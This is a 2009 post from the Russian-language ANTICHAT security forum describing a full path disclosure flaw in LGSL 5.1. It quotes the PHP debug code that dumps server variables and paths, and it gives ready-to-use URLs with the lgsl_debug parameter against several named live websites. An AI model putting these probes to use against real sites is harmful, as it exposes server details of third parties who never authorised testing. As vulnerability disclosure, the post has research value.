Обзор уязвимостей LGSL 5.1

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

27.06.2009, 17:01

eLWAux

Members of Antichat - Level 5

Регистрация: 15.06.2008

Сообщений: 941

Провел на форуме:
5111568

Репутация: 2399

Отправить сообщение для eLWAux с помощью ICQ

3. Full path disclosure

доступен, из-за дебаг-режима
lgsl\lgsl_files\lgsl_class.php:

PHP код:


		
			
  if ($_GET['lgsl_debug'])

  {

    echo "<hr /><pre>".print_r($_SERVER, TRUE)."</pre>

          <hr />#0# ".realpath($_SERVER['DOCUMENT_ROOT'])."

          <hr />#1# ".__FILE__."

          <hr />#2# ".realpath(__FILE__)."

          <hr />#3# ".dirname(realpath(__FILE__))."

          <hr />#4# {$lgsl_file_path}";

  }

use: добавляем к любой страничке GET параметр: &lgsl_debug=1
пример:

Код:

http://www.oghf.org.uk/e107_plugins/lgsl/lgsl_files/lgsl_class.php?lgsl_debug=bl0
http://www.oghf.org.uk/e107_plugins/lgsl/?lgsl_debug=bl0
http://www.greycube.com/site/e107_plugins/lgsl/?lgsl_debug=bl0